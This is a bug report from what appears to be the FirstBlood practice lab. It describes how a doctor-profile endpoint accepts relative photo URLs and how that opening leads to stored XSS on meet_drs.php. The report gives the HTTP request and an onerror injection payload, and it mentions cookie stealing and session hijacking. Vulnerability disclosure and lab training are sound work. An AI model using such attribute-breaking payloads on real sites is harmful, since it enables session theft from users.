FirstBlood-#1453Change Docto's image
This issue was discovered on FirstBlood v3

On 2022-12-10, ayush1098 Level 7 reported:

Hello Team,


We can upload the image from /drpanel/drapi/edit-dr.php endpoint and it will accept relative URLs to change the image.

Steps To Reproduce:

  1. Send this request:
POST /drpanel/drapi/edit-dr.php HTTP/1.1
Cookie: drps=e7ba713ce83c4caf4b907254d
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108", "Google Chrome";v="108"
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 [email protected] os6cfn5
Accept: */*, text/os6cfn5
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, os6cfn5
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 95


Exploiting this to stored XSS:

We can exploit this to XSS from the file name. This XSS only works for drId=1 and executes on meet_drs.php

The payload is /'"+onerror="alert(document.domain)

The magicbox will pop up on /meet_drs.php endpoint.


We can change the image even though there are restrictions in UI and with the XSS, we can do Cookie Stealing, Session Hijacking etc..

Thanks & Regards

Ayush Singh

P2 High

Endpoint: /drpanel/drapi/edit-dr.php

Parameter: photoUrl

Payload: NA

FirstBlood ID: 64
Vulnerability Type: Stored XSS

There is a stored XSS vulnerability on meet_drs.php from the photo of the doctor

FirstBlood ID: 61
Vulnerability Type: Application/Business Logic

It mentions that doctor photos can NOT be modified but it is actually possible to modify them